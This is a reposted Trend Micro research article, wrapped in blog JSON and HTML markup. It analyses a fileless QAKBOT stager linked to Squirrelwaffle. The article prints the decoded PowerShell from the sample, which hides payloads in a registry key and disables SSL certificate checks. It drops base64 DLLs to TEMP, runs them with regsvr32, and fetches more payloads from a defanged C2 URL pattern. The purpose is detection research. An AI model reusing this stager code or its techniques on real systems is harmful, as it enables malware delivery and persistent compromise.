{"id":44471,"date":"2021-12-17T00:00:00","date_gmt":"2021-12-17T00:00:00","guid":{"rendered":"urn:uuid:66c7b269-e304-c428-0811-4e4158ba6a0c"},"modified":"2021-12-17T00:00:00","modified_gmt":"2021-12-17T00:00:00","slug":"staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager\/","title":{"rendered":"Staging a Quack: Reverse Analyzing a Fileless QAKBOT Stager"},"content":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/l\/staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager\/cover-staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager.jpg\"><!-- Begin mPulse library --><!-- END mPulse library --> <head> <meta charset=\"UTF-8\"> <meta name=\"viewport\" content=\"width=device-width\"> <meta name=\"description\"> <meta name=\"robots\" content=\"index,follow\"> <meta name=\"keywords\" content=\"malware,cyber crime,cyber threats,endpoints,ransomware,spam,articles, news, reports\"> <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge,chrome=1\"> <meta name=\"template\" content=\"article1withouthero\"> <meta property=\"article:published_time\" content=\"2021-12-17\"> <meta property=\"article:tag\"> <meta property=\"article:section\"> <link rel=\"icon\" type=\"image\/ico\" href=\"\/content\/dam\/trendmicro\/favicon.ico\"> <link rel=\"canonical\" href=\"https:\/\/www.trendmicro.com\/en_us\/research\/21\/l\/staging-a-quack-reverse-analyzing-fileless-qakbot-stager.html\"> <title>Staging a Quack: Reverse Analyzing a Fileless QAKBOT Stager<\/title> <link href=\"https:\/\/fonts.googleapis.com\/css?family=Open+Sans:300,300i,400,400i,600\" rel=\"stylesheet\">\n<link href=\"\/\/customer.cludo.com\/css\/296\/1798\/cludo-search.min.css\" type=\"text\/css\" rel=\"stylesheet\"> <link rel=\"stylesheet\" href=\"\/etc.clientlibs\/trendresearch\/clientlibs\/clientlib-trendresearch.min.css\" type=\"text\/css\"> <meta property=\"og:url\" content=\"https:\/\/www.trendmicro.com\/en_us\/research\/21\/l\/staging-a-quack-reverse-analyzing-fileless-qakbot-stager.html\"><br \/>\n<meta property=\"og:title\" content=\"Staging a Quack: Reverse Analyzing a Fileless QAKBOT Stager\"><br \/>\n<meta property=\"og:site_name\" content=\"Trend Micro\"><br \/>\n<meta property=\"og:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/l\/staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager\/cover-staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager.jpg\"><br \/>\n<meta property=\"og:locale\" content=\"en_US\"> <meta name=\"twitter:card\" content=\"summary_large_image\"><br \/>\n<meta name=\"twitter:site\" content=\"@TrendMicro\"><br \/>\n<meta name=\"twitter:title\" content=\"Staging a Quack: Reverse Analyzing a Fileless QAKBOT Stager\"><br \/>\n<meta name=\"twitter:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/l\/staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager\/cover-staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager.jpg\"> <\/head> <body class=\"articlepage page basicpage context-business\" id=\"readabilityBody\" readability=\"50.706003078502\"> <!-- Page Scroll: Back to Top --> <a id=\"page-scroll\" title=\"VerticalPageScroll\" href=\"javascript:jumpScroll($(this).scrollTop());\"> <span class=\"icon-chevron-up\"><\/span> <\/a> <!-- \/* Data Layer *\/ --> <\/p>\n<div class=\"root responsivegrid\">\n<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12 \">\n<div class=\"articleBodyNoHero aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"research-layout article container\" role=\"contentinfo\">\n<article class=\"research-layout--wrapper row\" data-article-pageid=\"1714992555\">\n<div class=\"col-xs-12 col-md-12 one-column\">\n<div class=\"col-xs-12 col-md-12\" readability=\"9.203125\">\n<div class=\"article-details\" role=\"heading\" readability=\"37.78125\"> <span class=\"article-details__bar\" role=\"img\"><\/span> <\/p>\n<p class=\"article-details__description\">We analyzed a fileless QAKBOT stager possibly connected to the recently reported Squirrelwaffle campaign.<\/p>\n<p class=\"article-details__author-by\">By: Abraham Camba, Jonna Santos, Gilbert Sison, Jay Yaneza <time class=\"article-details__date\">December 17, 2021<\/time> <span>Read time:&nbsp;<\/span><span class=\"eta\"><\/span> (<span class=\"words\"><\/span> words) <\/p>\n<\/p><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<hr class=\"research-layout-divider\"> <main class=\"main--content col-xs-12 col-md-8 col-md-push-2\"> <\/p>\n<div class=\"richText\" readability=\"35.8\">\n<div readability=\"19.093333333333\">\n<p>We recently published how <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/21\/k\/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html\">Squirrelwaffle<\/a> emerged as a loader using two exploits in a recent spam campaign in the Middle East. Further monitoring and analysis from our incident response and extended detection and response teams (IR\/XDR) found that one of Squirrelwaffle\u2019s payloads includes <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/21\/k\/qakbot-loader-returns-with-new-techniques-and-tools.html\">QAKBOT<\/a>, a banking trojan and infostealer that cybercriminals have been using since 2007. &nbsp;<\/p>\n<p>During one of our threat hunting initiatives, we found a fileless QAKBOT stager capable of achieving persistence on its own. Furthermore, while QAKBOT is one of the payloads it stages filelessly in the registry, the stager is also capable of staging for more than one malware, a capability that can likely be abused for <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/21\/k\/qakbot-loader-returns-with-new-techniques-and-tools.html\">more campaigns<\/a> in the future.<\/p>\n<p><span class=\"body-subhead-title\">Technical details<\/span><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/l\/staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager\/figure1-fileless-qakbot-stager-infection-timeline.png\" alt=\"figure1-staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager\"><figcaption>Figure 1. Infection chain and timeline<\/figcaption><\/figure>\n<\/p><\/div>\n<div>\n<div class=\"richText\" readability=\"31\">\n<div readability=\"7\">\n<p>We found a suspicious PowerShell execution in an infected system in the following form:<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/l\/staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager\/figure2-staging-a-quack-reverse-analyzing-a%20fileless-stager.png\" alt=\"figure2-staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager\"><figcaption>Figure 2. PowerShell execution observed<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"35\">\n<div readability=\"15\">\n<p>When the code is obfuscated via base64, the command line parameter is usually long and noticeable via XDR. But this specific execution is noticeably short and reads filelessly in the registry despite its base64 encoding.<\/p>\n<p>Using Trend Micro\u2122 Vision One\u2122 with Managed XDR\u2019s progressive root cause analysis (RCA), we were able to trace back the execution to the legitimate process services.exe. It turns out that the suspicious PowerShell execution is triggered via a scheduled task.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/l\/staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager\/figure3-staging-a-quack-reverse-analyzing-a%20fileless-stager.png\" alt=\"figure3-staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager\"><figcaption>Figure 3. Tracking the suspicious execution with Trend Micro Vision One<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/l\/staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager\/figure4-staging-a-quack-reverse-analyzing-a%20fileless-stager.png\" alt=\"figure-staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager\"><figcaption>Figure 4. A scheduled task triggered the PowerShell execution.<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"36\">\n<div readability=\"17\">\n<p>The PowerShell command is an example of a fileless technique wherein the actual command is stored in the registry. In this case, it was stored in the registry entry HKCU:\\SOFTWARE\\Uiggvsbhwbcvhom).vqaryay, again encoded in base 64.<\/p>\n<p><span class=\"body-subhead-title\">Breaking down the decrypted strings<\/span><\/p>\n<p>We decrypted and analyzed the encoded string and broke them down. The code\u2019s variables seem to be obfuscated via a randomizer, likely to circumvent detection to a certain extent.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\">\n<div class=\"responsive-table-wrap\">\n<table cellpadding=\"1\" cellspacing=\"0\" border=\"1\">\n<tbody readability=\"2.5\">\n<tr readability=\"13\">\n<td readability=\"19\">\n<p>$KtdH = &#8220;{E6CF5F45-43D0-4514-96DE-151BD04A9079}&#8221; &lt;&#8211; Mutex Name<\/p>\n<p>$PgZYjDK = &#8220;qafsdb378960&#8221;&nbsp;&lt;&#8211; URL parameter (seems to be an ID)<\/p>\n<p>$d_IP = &#8220;\/zkr&#8221;&nbsp;&lt;&#8211; URL path<\/p>\n<p>$LngwgFRytJ = &#8220;jhysoq&#8221; &lt;&#8211; Registry Entry 1<\/p>\n<p>$awwWcsGQX = &#8220;gqdmzka&#8221;&nbsp;&lt;&#8211; Registry Entry 2<\/p>\n<p>$g_JXBUAMH = &#8220;irwtoakzd&#8221;&nbsp;&lt;&#8211; Registry Entry 3<\/p>\n<p>$WQudUrNwDr = &#8220;daedvnjlph&#8221;&nbsp;&lt;&#8211; Registry Entry 4 (Date Entry)<\/p>\n<p>$tvDQbLr = &#8220;HKCU:\\SOFTWARE\\Uiggvsbhwbcvhom&#8221;&nbsp;&lt;&#8211; Registry Key<\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"29.834586466165\">\n<div readability=\"8.390977443609\">\n<p>The next set of code sets PowerShell to skip secure sockets layer (SSL) certificate checks, <a href=\"https:\/\/til.intrepidintegration.com\/powershell\/ssl-cert-bypass\">bypassing<\/a> the inherent security protocol.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\">\n<div class=\"responsive-table-wrap\">\n<table cellpadding=\"1\" cellspacing=\"0\" border=\"1\">\n<tbody readability=\"4\">\n<tr readability=\"16.5\">\n<td readability=\"20\">\n<p>add-type @&#8221;<\/p>\n<p>&nbsp;&nbsp;&nbsp; using System.Net;<\/p>\n<p>&nbsp;&nbsp;&nbsp; using System.Security.Cryptography.X509Certificates;<\/p>\n<p>&nbsp;&nbsp;&nbsp; public class TrustAllCertsPolicy : ICertificatePolicy {<\/p>\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; public bool CheckValidationResult(<\/p>\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ServicePoint srvPoint, X509Certificate certificate,<\/p>\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; WebRequest request, int certificateProblem) {<\/p>\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return true;<\/p>\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }<\/p>\n<p>&nbsp;&nbsp;&nbsp; }<\/p>\n<p>&#8220;@<\/p>\n<p>[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy<\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"34.5\">\n<div readability=\"14\">\n<p>The string then checks for mutex to ensure a single execution, which is the usual for malware implementations. It also checks if the date is already set in registry entry 4. While the exact date is insignificant, it serves as a marker for this fileless malware. If the marker is not yet set, it will proceed with a drop-and-execute routine. Otherwise, it skips a routine.&nbsp;<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\">\n<div class=\"responsive-table-wrap\">\n<table cellpadding=\"1\" cellspacing=\"0\" border=\"1\">\n<tbody readability=\"3.5\">\n<tr readability=\"19\">\n<td readability=\"27\">\n<p>function UQTV()<\/p>\n<p>{<\/p>\n<p>&nbsp;&nbsp;&nbsp; $MwmmBxnVjO = Get-Random<\/p>\n<p>&nbsp;&nbsp;&nbsp; $RBnYwaG = (Get-ItemProperty -Path $tvDQbLr).$LngwgFRytJ<\/p>\n<p>&nbsp;&nbsp;&nbsp; if ($RBnYwaG) {<\/p>\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $_f_zhkPw = &#8220;$env:TEMP\\\\$($MwmmBxnVjO)1.dll&#8221;<\/p>\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $fPsS = [System.Convert]::FromBase64String($RBnYwaG)<\/p>\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [System.IO.File]::WriteAllBytes($_f_zhkPw, $fPsS)<\/p>\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Start-Process -FilePath &#8220;regsvr32.exe&#8221; -ArgumentList &#8220;$_f_zhkPw&#8221;<\/p>\n<p>&nbsp;&nbsp;&nbsp; } else {<\/p>\n<p>&nbsp;&nbsp;&nbsp; }<\/p>\n<p>&nbsp;&nbsp;&nbsp; $OlKwHqqEa = (Get-ItemProperty -Path $tvDQbLr).$awwWcsGQX<\/p>\n<p>&nbsp;&nbsp;&nbsp; if ($OlKwHqqEa) {<\/p>\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $_f_zhkPw = &#8220;$env:TEMP\\\\$($MwmmBxnVjO)2.dll&#8221;<\/p>\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $fPsS = [System.Convert]::FromBase64String($OlKwHqqEa)<\/p>\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [System.IO.File]::WriteAllBytes($_f_zhkPw, $fPsS)<\/p>\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Start-Process -FilePath &#8220;regsvr32.exe&#8221; -ArgumentList &#8220;$_f_zhkPw&#8221;<\/p>\n<p>&nbsp;&nbsp;&nbsp; } else {<\/p>\n<p>&nbsp;&nbsp;&nbsp; }<\/p>\n<p>}<\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"36\">\n<div readability=\"17\">\n<p>Depending on which registry entry is present (either registry entry 1 or 2), the string will drop and execute via regsvr32.exe a dynamic link library (DLL) file that was filelessly stored in either registry entry 1 or 2. We observed the DLL file is a QAKBOT variant.<\/p>\n<p>At this point, it\u2019s easy to assume that the stager is done since it has already dropped the main payload. We observed that at this stage, it has only performed half of its purpose. Continuing with the decrypted code, we see this:<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\">\n<div class=\"responsive-table-wrap\">\n<table cellpadding=\"1\" cellspacing=\"0\" border=\"1\">\n<tbody readability=\"2.5\">\n<tr readability=\"11\">\n<td readability=\"15\">\n<p>$PNpOl = (Get-ItemProperty -Path $tvDQbLr).$g_JXBUAMH<\/p>\n<p>if (!$PNpOl) {<\/p>\n<p>&nbsp;&nbsp;&nbsp; exit<\/p>\n<p>}<\/p>\n<p>$mbATsNmtaw = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($PNpOl))<\/p>\n<p>$anvsPJMJpe = 0;<\/p>\n<p>$DXSMgDi = $mbATsNmtaw.Split(&#8220;;&#8221;)<\/p>\n<p>foreach ($qtNuK_ in $DXSMgDi) {<\/p>\n<p>&nbsp;&nbsp;&nbsp; __NOxzyOQT $qtNuK_<\/p>\n<p>&nbsp;&nbsp;&nbsp; if ($global:rcxEcF -eq 1) {<\/p>\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; break<\/p>\n<p>&nbsp;&nbsp;&nbsp; }<\/p>\n<p>&nbsp;&nbsp;&nbsp; $anvsPJMJpe++<\/p>\n<p>}<\/p>\n<p>exit 0&nbsp;<\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"48.054582210243\">\n<div readability=\"42.715184186882\">\n<p>The stager reads registry entry 3, and the content of this registry is another encoded string. When decrypted, the string is a list of combined IP addresses and ports. Configured in the memory, the stager would have access to the URL format of hxxps[:]\/\/&lt;IP&gt;:&lt;Port&gt;\/zkr?n=qafsdb378960, where it would take three parameters:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\"><\/span>The first parameter is for the switch case<\/li>\n<\/ul>\n<ol>\n<li>Execute via regsvr32.exe&nbsp;<\/li>\n<li>Execute via Start-Process (exe)<\/li>\n<li>Execute via invoke-expression (IEX)<\/li>\n<li>Execute via cmd.exe<\/li>\n<li>Execute via Start-Process (bat)<\/li>\n<li>Execute via Start-Process (vbs)<\/li>\n<\/ol>\n<ul>\n<li><span class=\"rte-red-bullet\"><\/span>The second parameter is for error handling.<\/li>\n<li><span class=\"rte-red-bullet\"><\/span>The third parameter is for the content of the PE file to be downloaded and executed.<\/li>\n<\/ul>\n<p><span class=\"body-subhead-title\">Conclusion<\/span><\/p>\n<p>While we observed this fileless stager only deploying QAKBOT, the stager also serves as a stager for other malware. It also achieves persistence via a scheduled task, which means it can also deploy multiple types of malware as deemed necessary by the cybercriminals behind this stager, with each malware execution triggered with the scheduled task.<\/p>\n<p>There were instances where QAKBOT has tried to hide its tracks by being fileless. However, this is the first time we have encountered this kind of fileless stager with persistence, and having the capability to <a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/microsoft-exchange-servers-hacked-in-internal-reply-chain-attacks\/\">move laterally<\/a> and download <a href=\"https:\/\/blog.talosintelligence.com\/2021\/10\/squirrelwaffle-emerges.html\">other types<\/a> of malware such as ransomware. Security teams are advised to reinforce and enable their monitoring mechanisms for better visibility of fileless malware artifacts, suspicious variables, and malicious processes.<\/p>\n<p><span class=\"body-subhead-title\">Trend Micro solutions<\/span><\/p>\n<p>Users can&nbsp;also&nbsp;opt&nbsp;to protect&nbsp;systems&nbsp;through&nbsp;<a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/user-protection\/sps\/endpoint\/server-protect.html\">managed detection and response (MDR)<\/a>, which enables the expertise of skilled cybersecurity personnel capable of reading at and between data gathered by advanced artificial intelligence and machine learning technology to correlate and prioritize threats, determining if they are part of a larger attack. Combined with the visibility to track and monitor both malicious and legitimate processes abused for fileless threats and routines in siloed systems, MDR can detect threats before they are executed, preventing further compromise and mitigating the risks of an attack\u2019s lateral spread.<\/p>\n<p><span class=\"body-subhead-title\">Indicators of Compromise (IOCs)<\/span><\/p>\n<p>View the full list of IOCs <a href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/l\/staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager\/IOCs-staging-a-quack-reverse-analyzing-fileless-QAKBOT-stager.txt\" target=\"_blank\" rel=\"noopener\">here<\/a>.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<section class=\"tag--list\">\n<p>Tags<\/p>\n<\/section>\n<p> <\/main> <\/article>\n<\/div>\n<\/div><\/div>\n<\/div>\n<p> <!-- \/* Core functionality javascripts, absolute URL to leverage Akamai CDN *\/ --> <!--For Modal-start--> <\/p>\n<p> <span>sXpIBdPeKzI9PC2p0SWMpUSM2NSxWzPyXTMLlbXmYa0R20xk<\/span> <\/p>\n<p> <!--For Modal-end--> <!-- Go to www.addthis.com\/dashboard to customize your tools --> <\/body> Read More <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/21\/l\/staging-a-quack-reverse-analyzing-fileless-qakbot-stager.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>We analyzed a fileless QAKBOT stager possibly connected to the recently reported Squirrelwaffle campaign. Read More HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":44472,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[61],"tags":[9510,9521,9511,9508,9513,9539,9585],"class_list":["post-44471","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-trendmicro","tag-trend-micro-research-articles-news-reports","tag-trend-micro-research-cyber-crime","tag-trend-micro-research-cyber-threats","tag-trend-micro-research-endpoints","tag-trend-micro-research-malware","tag-trend-micro-research-ransomware","tag-trend-micro-research-spam"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v28.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Staging a Quack: Reverse Analyzing a Fileless QAKBOT Stager 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Staging a Quack: Reverse Analyzing a Fileless QAKBOT Stager 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2021-12-17T00:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/l\/staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager\/cover-staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager.jpg\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Staging a Quack: Reverse Analyzing a Fileless QAKBOT Stager\",\"datePublished\":\"2021-12-17T00:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager\\\/\"},\"wordCount\":1273,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2021\\\/12\\\/staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager.png\",\"keywords\":[\"Trend Micro Research : Articles, News, Reports\",\"Trend Micro Research : Cyber Crime\",\"Trend Micro Research : Cyber Threats\",\"Trend Micro Research : Endpoints\",\"Trend Micro Research : Malware\",\"Trend Micro Research : Ransomware\",\"Trend Micro Research : Spam\"],\"articleSection\":[\"TrendMicro\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager\\\/\",\"name\":\"Staging a Quack: Reverse Analyzing a Fileless QAKBOT Stager 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2021\\\/12\\\/staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager.png\",\"datePublished\":\"2021-12-17T00:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2021\\\/12\\\/staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager.png\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2021\\\/12\\\/staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager.png\",\"width\":2334,\"height\":1875},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Trend Micro Research : Articles, News, Reports\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/trend-micro-research-articles-news-reports\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Staging a Quack: Reverse Analyzing a Fileless QAKBOT Stager\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence 